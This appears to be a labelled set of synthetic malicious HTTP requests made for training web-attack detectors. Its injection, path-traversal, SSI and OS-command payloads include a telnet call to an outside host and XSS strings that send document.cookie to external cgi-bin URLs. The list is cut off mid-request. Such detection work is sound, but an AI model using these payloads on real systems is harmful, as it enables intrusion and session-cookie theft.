class: XPathInjection
GET /rdedlldajhtuusM17p3A/clne/dnRDNzg.png? HTTP/1.0
Host: www.htctfmshdo.uk
Connection: keep-alive
Accept: audio/x-wav, video/*
Accept-Charset: iso-8859-4, windows-1258;q=0.2, cp-936;q=0.9, iso-8859-5;q=0.0
Accept-Encoding: identity;q=0.7, gzip;q=0.0, gzip, compress, gzip;q=0.1
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 148.78.27.103
Cookie2: $Version="15"
Date: Tue, 21 Jun 05 06:59:40 UTC
If-Unmodified-Since: Sun, 25 Oct 09 02:48:29 UTC
If-Match: *
If-None-Match: "DZJpa.EiMQ_QObpkwj"
If-Range: "4fKoZ1-u7aEyz0vD7k"
Max-Forwards: 378
MIME-Version: 4.2
Pragma: agrCfTy=jao
Proxy-Authorization: Digest username="annrnhk"
Referer: /liejjh/rh3ei/bEorn.htm
User-Agent: (i  <   count(Lew/child::text())  and    j     <    count(tka5j7/child::comment()) and  k  < count(rlegoq/child::*)    )
UA-Color: color16
Transfer-Encoding: roqm
Upgrade: oolr/4.9, bhmeg/8.2, eks/9.6, cid/9.6, Nteies/6.7
Warning: 849 11.210.111.193 "r2apTszano81jij" "Fri, 22 Apr 05 09:45:13 CET"
X-Serial-Number: 0552826748699653
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48383
Start - Id: 49234
class: XPathInjection
GET /iSa6KLD/tKNFwRxjntofK/meCgcteKit9slm/C.Anetcatvpk0q6l09H./1w8tNMHNovE/eZ1jjj60E4@Jr/ALexlibjiframeDor/eCt.mspx?ticriip1agms=kSv.n8&uai2ta=eapiea4r1tabo&tydxt0iL=uo30ezhe%27++or+6+++%3C++++count%28path%2Fchild%3A%3A*%29+or++%27dceore%27+++%3D++++%27&likuufu=7&sAs=810930&to4nn=dievdqafes4Cemi&LypeclEl6jaserp=ptiexplmb2ow&tWQmopenDCK3@=%26hiv2&rrdnehitI4=doidNnDa8ee&Oi8LEuvlerhI9d=+teLebns3rqoe HTTP/1.1
Host: www.ehaol.st:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: cp-936;q=0.6
Accept-Encoding: deflate, compress;q=0.4, deflate;q=0.6, identity;q=0.5, deflate;q=0.0
Accept-Language: o-iwtTihe3;q=0.3, 0sE-i;q=0.6, ta4n-b4ot;q=0.2, o0-eoutudo;q=0.7, cuafse-e1acplT;q=0.3
Cache-Control: min-fresh=2652
Client-ip: 198.204.145.121
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="911"
Date: Fri, 09 Apr 10 14:47:01 UTC
ETag: W/"@I55TFnnWMOE6wgh"
Expect: 100-continue
From: ebT3@niat.fr
If-Modified-Since: Mon, 29 Dec 08 04:50:04 UTC
If-Unmodified-Since: Wed, 23 Jan 08 11:47:52 UTC
If-Match: "B3dIScTW0-631oqrVre"
If-None-Match: "EdGH8tIYRZaWjxH"
If-Range: "D@9Plj7rNhFwXCgE.a"
Max-Forwards: 02
MIME-Version: 5.2
Pragma: johtk='ttQ'
Proxy-Authorization: NTLM d2NybGtuaXlhYXRpWWU4cmVIZDhkZWppaHVhdzFEY2RzYWVud3Rucm1kb2xmUkxk
Authorization: lrtk2e iuti=tps7h
Range: -364650
Referer: http://7jtiu.gov/dtidieaT/ipl8it5a/cfee/1ttJ/hatFte.png
TE: gzip;q=0.7,chunked;q=0.2
Trailer: Date
User-Agent: h_DXy2 http://www.tbtDrr.com
UA-CPU: Sparc
UA-Disp: 2447,4165,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 353x220
Via: 1.3 194.30.11.242, 6.1 www.eoxiEct0.css, Isbr6n/5.0 234.74.124.76
Transfer-Encoding: identity
Upgrade: 8rpe5E/5.6, tre/6.8, 6Gt/7.8, xleel/2.7
Warning: 218 61.225.42.189 "r5Iaw8enn" "Mon, 02 Feb 09 06:59:22 GMT"
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49234
Start - Id: 44140
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.1
Host: 42.63.92.71
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: lsCiv-aeimi, fnynfa-nNceea, 0mhbah-iAs
Cache-Control: no-store
Client-ip: 253.174.138.253
Cookie: yaJouAiyuekie=addaa;lIOnsr=11155185;iolplrbsyfnnhe=29785256
Cookie2: $Version="03"
Date: Thu, 15 Sep 05 12:55:32 UTC
ETag: W/"W7fa4Q-.MjhJ7B8G"
Expect: Fzazt0Oa
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 29 Jan 10 02:08:33 CET
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 541
MIME-Version: 4.2
Pragma: 6mAtm9f=4njseaeI
Proxy-Authorization: Basic ZHJueHU6c3J0M2FIbGU=
Authorization: ogSor oauhe=c6eam
Range: -1045,34811-03148
Referer: /notg/lfTFe/nNtmdst.ace
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/9.1 (X11; U; Open BSD i386 0.3; hn-28; rv:5.1.6) Gecko/12394727
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: 4.5 59.90.147.15
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 107 www.si6e.html "aijehiis7sesns5zav5" "Sun, 10 Oct 04 08:09:53 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44140
Start - Id: 39599
class: SSI
GET /b-pi.NX1o6ytsCNeHM1/z5tet9/tzAy0pCv9ve7/wuauYHOt/hBMfzrx3vzxnvYD/p1Rz9@LjMSZbvZ0MOs5b/apetteha7lthlse2ee/iaioeednmst/Edaidqteee.gif?md=7-82tnr&7a=097&Qy=820&iitbLtas=hsm&BOojNsldtsL4cl=%3C%21--++++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E HTTP/1.0
Host: 90.227.237.65
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 239.19.170.214
Cookie: ioodn7=ie;0tamm=01268;xg6FEbin=tilexeclcy8sae eehlsu
Cookie2: $Version="046"
Date: Wed, 31 Oct 07 21:38:16 CET
ETag: W/"oVLo4-iYAWfQ2T33"
Expect: 100-continue
From: k4wcg@aEdi7a2.de
If-Modified-Since: Thu, 06 Dec 07 03:52:15 UTC
If-Unmodified-Since: Tue, 31 Oct 06 24:50:49 UTC
If-Match: "Q5nGeuFDN-Co5fSsduu"
If-None-Match: "oovCZKi-enM4KIkL"
If-Range: Fri, 21 Jul 06 02:36:14 GMT
Max-Forwards: 594
MIME-Version: 2.2
Pragma: diautusa=buiiheq
Proxy-Authorization: Basic UmV1ZW5yZWc6b2VqZHJn
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: /ieapo/2btMtE.php3
TE: gzip;q=0.9,deflate;q=0.8
Trailer: Authorization
User-Agent: Mozilla/0.5 (X11; U; Linux i386 4.8; re-ey; rv:7.1.6) Gecko/50482006
UA-CPU: PowerPC
UA-Disp: 7073,179,8
UA-OS: Win9x
UA-Pixels: 1841x260
Via: 8.9 www.Ap2Rh3wE.tiff, 3.6 105.138.12.231:9, 5.8 www.reqI.html:65967
Transfer-Encoding: deflate
Upgrade: t8veon/3.4, o1M/1.3, ooayr/1.5, edmt/1.1, ecik/3.7
Warning: 852 134.152.169.139 "ano4rrnmet8s13t" "Mon, 26 May 08 01:24:12 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 51537032626
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39599
Start - Id: 49241
class: XPathInjection
GET /dqsq3UASaM/wqA4n6sFnty7hfha/owajN/frdihztneAoa9aCaocn/o8z87Hlwp-U129c/pLb6O/hwh/H3zKn3ma/OB3h90metalLJ69/46xJU1mWcujq@Bh5_l.gif?emeIan=joecmd2&ei9c=6779&kap4oa8Eehlmo=46xH&nGEOH0KJ=7ntotaffo&ptgi=27&tiawR4tae=8&a5ddu=dipW&rlekitu=hs&amitf6E=t+s%26xactisln&As=83&soemeps0yruat=optohisgse&3Xknetcat0V20_wmi=2607+++or++++1%3C+++5t%2FR5%2Fq%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D86%5D+++++or++5708%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&Ntus9pOa=fNkvn%24hsgfeas HTTP/1.1
Host: www.a2aennrd.com
Connection: close
Accept: application/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 200.206.243.113
Cookie: micaioerygcofn=ur
Cookie2: $Version="1"
Date: Thu, 01 Jun 06 05:29:56 GMT
ETag: "tnnfuaGAJp@dyfsdeg"
Expect: 100-continue
From: ebT3@niat.fr
If-Modified-Since: Sat, 07 Jan 06 05:13:57 GMT
If-Unmodified-Since: Mon, 30 Mar 09 20:58:04 GMT
If-Match: "NKB9@0dImMA9_c."
If-None-Match: *
If-Range: *
Max-Forwards: 0200
MIME-Version: 9.4
Pragma: qinrr='Herrgn'
Proxy-Authorization: NTLM ZGhvaW5yZWlhdG1lcmV5Z2luam9Ub29hY29sNWxkbmgzT2VpcWVudGR2dGZTcw==
Authorization: NTLM Y2lpbmNhb2RyazRsbnM4d2FUbm5uZXVlejVpdDJpcnJ2RW1h
Range: -364650
Referer: /neshlodj/ahAt/rrtb/ihma/irhci.jpg
TE: trailers
Trailer: TE
User-Agent: Mozilla/1.2 (X11; U; Open BSD i586 6.8; en-rd; rv:5.6.7) Gecko/41936582
UA-CPU: 68000
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 718x8492
Via: 1.3 138.91.94.104, 3.9 www.tId1ps.gif, FTP/4.6 www.2snA.jpg
Transfer-Encoding: compress
Upgrade: ja8xa/5.6
Warning: 066 www.lqoEr.jpg "ls5eia" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49241
Start - Id: 45981
class: PathTransversal
PUT /dropbody-P/7tmpNhavingrT0/execGCqdoptoYCMl@cW/4c3YbLlaN/cshN4v/etKlt/nql8OkgJlike@gN/tVc71/ai8pyt/pdstmalH0i/aWux89ftgYG.js? HTTP/1.1
Content-Length: 226
Content-Language: dvb,ttbsn,eAfe
Content-Encoding: identity
Content-Location: http://www.rncEeebL.biz/huliterD.asp
Content-MD5: bnRUc2Vhc2UyNXJlc2xUcA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Jan 06 21:26:07 GMT
Last-Modified: Tue, 02 Feb 10 06:14:31 UTC
Host: 173.121.214.16
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress, deflate, deflate, compress, gzip
Accept-Language: ../../../WINNT/autoexec.bat
Cache-Control: only-if-cached
Client-ip: 121.84.201.116
Cookie: nkth=l3opttwead$1ua;salhzhtthnM9s=7082503837;egeaa=3756662862;rordtsHpN2idua4=9908;ravRmIwaoUptCC=processing-instructioneg&&;phguhtdl=yinsertLsce'etas:asun
Cookie2: $Version="1"
Date: Sun, 04 Nov 07 23:58:17 UTC
ETag: W/"hfrms3FDNZktwdG2Zu8"
Expect: nr6h=isbahi
From: lapnn@rne0nheDa.de
If-Modified-Since: Mon, 26 Mar 07 12:02:21 UTC
If-Unmodified-Since: Thu, 28 Dec 06 14:08:38 GMT
If-Match: *
If-None-Match: "gq1jk6iM6wHAh5Gh0Jvh"
If-Range: Fri, 29 Jun 07 14:31:50 GMT
Max-Forwards: 858
MIME-Version: 4.8
Pragma: osh='de4'
Proxy-Authorization: Basic SXVlTzpvZTlvSXQx
Authorization: NTLM ZXNydGxuZWR5dHVuZUpjdGNpQTFuaXRlcEhEMW9yazlxNW5zcWF0eWFsYW5ucGx0
Range: 645487-,-9584,58622-
Referer: http://www.a9lg7ht2.net/ifawzu/nfei/6lnni/3gxhitmr/agt4.exe
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: \autoexec.bat
UA-CPU: StrongARM
UA-Disp: 548,5164,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 548x253
Via: 1.6 43.115.114.60, HTTP/2.5 www.wdn09.gif:6303, 6.2 244.11.133.107:304
Transfer-Encoding: gzip
Upgrade: aecn/5.8, CMno/3.6, r4lre/4.3
Warning: 392 248.155.194.89 "olpeyotcyYya" "Sun, 14 Aug 05 03:35:30 UTC"
X-Forwarded-For: 87.224.179.54
X-Serial-Number: 466621533909615
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

qxtr23X=possth&hei0U05rlgd=rlrcp&SfJWcH_=Qyncaveibloi&hl=bngroup bychs&da6on4s=78937&naeorsrv9fogu=47&ke=oy5oesytrtijtesa3c&otlstlqm8ee5o=0&atifhbn6=osaal o>3njev:&2OfrnN=n aOi\dOee)NifS&aui8NKe4=2&elk0tgmi=56730&to=oc

End - Id: 45981
Start - Id: 38205
class: LdapInjection
GET /ceds8ffsTnapt1eMee.jpg?hsbhr=n_1c8RGep.z&ohrnmyneQ=05&talpiDppmmh=y5stylea&hldsnnATTahprnt=Dsas5VnpMwSenu&a4itaepn=46117415&iwandyearom=Srpu%5DtlYopenn8o&egwg=tgshutdown&2dicl80nae=se%5Cinsertetey0%3C%5C9hee&tpuhghnGe6nmlT=tG-MDu&xmlhome2Uwd1nZdropu8=5&mailneON9Lscript3=itQe%29%28%26%28objectClass+%3D+++2i*%29&GhzNfJhI=april1OIah3e&rth=%7CEnd HTTP/1.0
Host: www.eaMp.de
Connection: hnhf
Accept: application/postscript, video/*, text/xml
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate;q=0.3, compress;q=0.1, gzip;q=0.7, deflate;q=0.8
Accept-Language: 6x-ht7sa;q=0.9, d7tldtu-ai
Cache-Control: no-store
Client-ip: 9.211.101.123
Cookie: ceBoniYt=9;EdtOdenbehwyil=p;SNmZteTtuse=>o?;IlsS=438918581;TXvB_q5ZKqGV=te
Cookie2: $Version="98"
Date: Thu, 24 Aug 06 19:18:45 CET
ETag: W/"K_UdcY8UF88HpDJdoTgY"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Sat, 14 Feb 09 13:01:18 UTC
If-Unmodified-Since: Fri, 06 Jul 07 20:26:44 UTC
If-Match: "UbZneqKfi8XP9Ar6"
If-None-Match: *
If-Range: Wed, 18 Jan 06 11:45:28 GMT
Max-Forwards: 67
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: Basic c3NzaWk6ZU5kZQ==
Range: 143609-2,-687,75-
Referer: http://asiniius.net/EWSrktlk.sh
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.4 (compatible; MSIE 4.5; Mac OS X; nionnyxtns)
UA-CPU: PowerPC
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 321x2267
Via: 8.1 123.177.211.141, 9.7 142.211.220.112:3, FTP/0.1 169.49.77.134
Transfer-Encoding: gzip
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38205
Start - Id: 48702
class: XPathInjection
PUT /6PF193In/oURXF/tc/b9TU7N9sCPZkkadminE/dodhdiwpc3/sdinijanxOesaq/eB2PFqko_N/2AZe7h4XWTKyU2mT.css? HTTP/1.1
Content-Length: 293
Content-Language: a3Hn,eWoaIgeu,tosi
Content-Encoding: gzip
Content-Location: http://www.iEImhetl.st/imiILo/rmlurAb.cgi
Content-MD5: ZXZnM2lpMmlpNFJuZWF0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 26 Nov 08 10:11:10 GMT
Last-Modified: Mon, 30 Nov 09 03:23:19 GMT
Host: 249.12.128.26:92146
Connection: abomiwn
Accept: video/*;q=0.3, image/*;q=0.4, text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: IkiTewgo-rtoanR30;q=0.5, Eqeaense-liltjse, usnes-tehH
Cache-Control: min-fresh=17177
Client-ip: 159.42.128.3
Cookie: huuae=bosexect;cat7rVha4=taem t6 T3;@Wx0c=~6techoleisucst0insertrIhttpsalr;Eorr= ie tshobhcV
Cookie2: $Version="879"
Date: Sun, 02 Dec 07 10:27:14 UTC
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: 100-continue
From: atds@noHasdc.cz
If-Modified-Since: Sat, 07 Aug 04 11:49:23 UTC
If-Unmodified-Since: Wed, 23 Sep 09 22:30:20 GMT
If-Match: *
If-None-Match: "trprGR5jxF_KLyH2Pi_"
If-Range: Sat, 06 Aug 05 09:41:46 CET
Max-Forwards: 2258
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZnBnd3Q6b25sZVg=
Range: 569156-2482
Referer: http://www.3silus.com/enoaeta/ain0/ttyolol/rN0ekon.dll
TE: deflate
Trailer: Expect
User-Agent: 5ar4epyrB/7.9.6
UA-CPU: Sparc
UA-Disp: 527,267,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 640x9904
Via: HTTP/0.7 16.101.160.147, 4.3 www.feteocs.css, HTTP/4.6 www.8nuTd.tiff:45862
Transfer-Encoding: osspud
Upgrade: phe/8.1, Jtnat/6.7
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 231.51.107.90
X-Serial-Number: 70312364698710750668
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

68RvZZOvqOA6=unionyunion&ptrteboeees=11100&in0ToEotErna8o=otnp9irAwytd7s5no&nemcitnNeern=(i   <    count(fnre/child::text()) and    j     <   count(no5oe/child::comment()) and  k < count(wog/child::*) )&oAcaCianpel=12&8fnd4ml=841506&boeojdiz=en4

End - Id: 48702
Start - Id: 36812
class: OsCommanding
GET /jTs2tIdvnw9.cq/hAechooTOpzjSO/o5oau8nM2araq/dmrj4X9szvpq/ayHp/YFG3stdin30i7e/itenomeztxctCgroPeyN/trKNq/2s0eHee/DobjectQmformP/R56P/aILP.jsp?saarntm1onsi=9&rkgkdr=iltjtnstmcoitojt0&esaie=%5C%22++%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.riatlillelas.com+896%5C%3B&ori2sbeieL=nfd&snn=qKR&9LgbaBdpennagt=47&tEnohsw=959&rjaaiesadY=ka1euq1sephesaxtd&qrmasa4jhitt9=vbMZcXy&zbyssyZjA=ehensobE7aI&rositet=+et%3Dou&bert4wtxnqA=hitalao1htb4moesr&eK4tGuvcopyZ@2y=%270bgsoundLtwcopy%29Vehligd2hrs HTTP/1.1
Host: 151.85.193.186
Connection: xQh7y
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: Htbmt0-3se, t-thAi;q=0.7, msnnr-nr6oda1j, elwdo-u4u
Cache-Control: no-store
Client-ip: 167.61.38.24
Cookie: oajB=i78sPVBW
Cookie2: $Version="089"
Date: Thu, 22 May 08 23:01:13 CET
ETag: W/"Jckp2N-T3XmAODG1S"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Tue, 13 Jan 09 19:21:41 UTC
If-Unmodified-Since: Tue, 08 Mar 05 02:05:43 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Jun 05 15:25:02 UTC
Max-Forwards: 7498
Pragma: n1=ouhpba
Proxy-Authorization: Digest response="58C55118C31Bc2CeF0dbFC24cD1DCe18"
Authorization: Basic YWdzcW51OlRldXNpZGc=
Range: 853-078834,3-3
Referer: http://www.5hhd.de/7du6tetu/a2es/ysembeis/hmhuasht.htm
TE: gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: neIecpufs/7.7.0
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 8261x3395
Via: 4.4 www.eoatezc.gif:16570
Transfer-Encoding: identity
Upgrade: diz/2.5, oaahpo/0.7
Warning: 158 www.0rmm.html "ya0trItDfsofel" 
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36812
Start - Id: 48656
class: XPathInjection
POST /d8YVF1tHZCd.m04wRzV/eibdonado1iTcne4eB61/uS-ihQY@Axe6HXH.jsp? HTTP/1.1
Content-Length: 241
Content-Language: tse5trsx
Content-Encoding: compress
Content-Location: /eselhpE0/lMiae/iydi/Nc1i4/ythrIs.cgi
Content-MD5: NTV5c296cnVPcm5pcmVuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Sep 09 09:03:32 GMT
Last-Modified: Mon, 29 Mar 04 12:24:30 CET
Host: 244.206.242.65
Connection: typ6hi
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: euihni-s, sl-e, iqh-nccet, tehhewA-edcothtk;q=0.0
Cache-Control: min-fresh=5
Client-ip: 125.212.241.80
Cookie: ddntLaee=oSZvb;Agonee4p1twdwta=d'oj;zesdor6d=s1gs
Cookie2: $Version="57"
Date: Fri, 17 Dec 04 11:14:02 UTC
ETag: W/"QyHg7ulSwO5be0D"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Mon, 04 Oct 04 20:56:05 UTC
If-Unmodified-Since: Fri, 13 Nov 09 12:43:24 GMT
If-Match: "6mmMMgBTJ-fziOhaiZYm"
If-None-Match: *
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 3676
MIME-Version: 0.2
Pragma: iostchr=S4ii
Proxy-Authorization: Tbena sv18tb=rrtc1i
Authorization: Basic dzlqcmU6emVIbw==
Range: -046912,8351-4,007308-22
Referer: /m3E8mmcr.jsp
TE: trailers,deflate,gzip
Trailer: TE
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 1.0; oe-et; rv:8.9.8) Gecko/44926761
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 6.3 www.idoe6.jpg, HTTP/2.1 83.166.180.82
Transfer-Encoding: deflate
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 2534410035139389
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

U3=ey%2F7ngfN%2FeaesT%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D194%5D+or+++++%27hsrlgtoe%27+%3D+%27&emgyimAqwsp3=vsanreasoen%2B%27r%3B%2F2&aE=5097&tuteu2wEnoefeao=031&whL3vbscript0FZP2CZ=13&NMpF%uG=12169287&ibro=384&nxhdliexer=8a&a6eQ=8175

End - Id: 48656
Start - Id: 47492
class: XSS
GET /xqIl0aO/iNQcm@EO6_Sscript3E.nsf?CCIQ=%3Cobject+classid+++%3D+%22+++++clsid%3A...++++%22++codebase++++%3D++++%22javascript%3A+%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.veve.com%2Fcgi-bin%2Fel.cgi%27%2Bdocument.cookie%29%3B%5D+%22++++%3E&tsn82qA=bw4 HTTP/1.1
Host: 229.149.92.18
Connection: close
Accept: image/*, application/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-age=40
Client-ip: 229.228.100.156
Cookie: tnsl=rl;8u_B=i9XKHvJVMrtR;g72merog=YpNAa
Cookie2: $Version="1"
Date: Sun, 11 Dec 05 13:03:38 CET
ETag: W/"NSxL_5tTC4DMTJwF"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Thu, 31 Jul 08 17:37:27 GMT
If-Unmodified-Since: Sun, 31 Aug 08 12:28:57 CET
If-Match: *
If-None-Match: "-d7mEccy.PWPKU7xY"
If-Range: *
Max-Forwards: 556
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: NTLM aWVxcDJhdDdkc2RhZWVkaFM3YTBkeW5sZmc5bG1wcHl1RWlvZW9tc25sZQ==
Range: 9183-933,-0
Referer: /ock1/atlreeo/lkaDasd/nDOfj.avi
TE: gzip,gzip;q=0.2
Trailer: Authorization
User-Agent: Mozilla/9.8 (Machintosh; U; PPC 3.8; wh-pi; rv:9.8.0) Gecko/75991724
UA-CPU: x86
UA-Disp: 612,9205,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: identity
Upgrade: qeobOo/1.5, nnmpa/1.1, ijxs/9.6, yly/6.2, grn/3.6
Warning: 377 www.ttf1aee.tiff:8 "utk7eeufto6reia" "Thu, 23 Jul 09 20:34:19 CET"
X-Forwarded-For: 223.101.141.206
X-Serial-Number: 48112496441051
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47492
Start - Id: 42621
class: SqlInjection
GET /qulpconnectSEGE/L4uwieoelkgni/fRnfFp3_tq0/uoa8rotoeassarae/-ACe3qcPC4a/aYdaea/NWn@xxAw@0V4/eylt9jx_NOiJRX6NX/aldriaH1rndytiR/PcnwtziarlmoaWzefai/lroageoztelt.cgi?hSdItgtsl=OR++%27oSt%27+BETWEEN+++%27R%27+++++AND++%27T%27&nhsc=jhede0adeoS8ieqssg HTTP/1.0
Host: 88.17.251.129
Connection: keep-alive
Accept: image/png;q=0.3, audio/x-wav;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 59.30.97.76
Cookie: wQTx9gl7=0sg&eoe =vdoeh0Udiv0;-dXwp-c8FEE=1n6s0Lg;al5e= twli
Cookie2: $Version="0"
Date: Mon, 11 Apr 05 10:39:54 GMT
ETag: W/"FXXTyG49LAn3eWm@Zb"
Expect: 100-continue
From: auoiBfre@itih.st
If-Modified-Since: Tue, 22 Jul 08 06:16:47 UTC
If-Unmodified-Since: Fri, 23 Jan 04 21:56:38 GMT
If-Match: *
If-None-Match: "ztuighI.OW0wgbl6ZpEm"
If-Range: "k_s3mn@WlgTRkLRoAi_"
Max-Forwards: 21
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic aWl0bmxqOmk1c29ueDI=
Authorization: ayhmi3 v0E7E=cnmi
Range: 72326-9838
Referer: /KIhaoci.jpg
TE: trailers,gzip
Trailer: Cache-Control
User-Agent: emcsdtaitDgjam
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4720x346
Via: HTTP/9.2 www.Enistre.shtml, jth/5.6 www.03mp.png, 1.6 www.wiu0n.gif
Transfer-Encoding: identity
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 8496085011716773
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42621
Start - Id: 47180
class: XSS
GET /zlvXTgwWkK6WKOOrU7/2s.htm?aqtyn=%3Ca++href+++%3D+%22++++about%3A%3Cs%26%2399%3Bript+%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.itns.com%2Fcgi-bin%2Forli.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E+++++%22+%3E&muoofteeailt=ntutuandtg%3FThme&Ain=715 HTTP/1.0
Host: 8.171.76.191
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.4, gzip, gzip;q=0.9, gzip
Accept-Language: usligsa-c;q=0.3, otses-eegtnoea, 1sciia-eeitOf;q=0.3, 8pn-o;q=0.8
Cache-Control: no-store
Client-ip: 102.236.20.245
Cookie: ncd2S=047915;oaf=sxbn 
Cookie2: $Version="93"
Date: Thu, 28 Oct 04 24:37:32 UTC
ETag: "mosfK1Kq7WDVNdG"
Expect: bltUcf=Sn6ay
From: atrc@mosrloac8i.net
If-Modified-Since: Mon, 05 Jun 06 14:53:18 UTC
If-Unmodified-Since: Mon, 17 Nov 08 14:47:33 CET
If-Match: "iU.jbS1HDZm4qGRxZ9"
If-None-Match: "7w1NhNht1D-_UeimI56I"
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 691
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: NTLM ZmxlaU5BM2V0cnJ1YW1vY210aWV0cnRRb3J6c250bm95dFZhVGhjaHU=
Range: 80-60466,-60,-277
Referer: /ehuhst.html
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: e8ara (suqK7_; s.20vX4oDK; awNx5Jg; t-RATxTF; rOHsAUW)
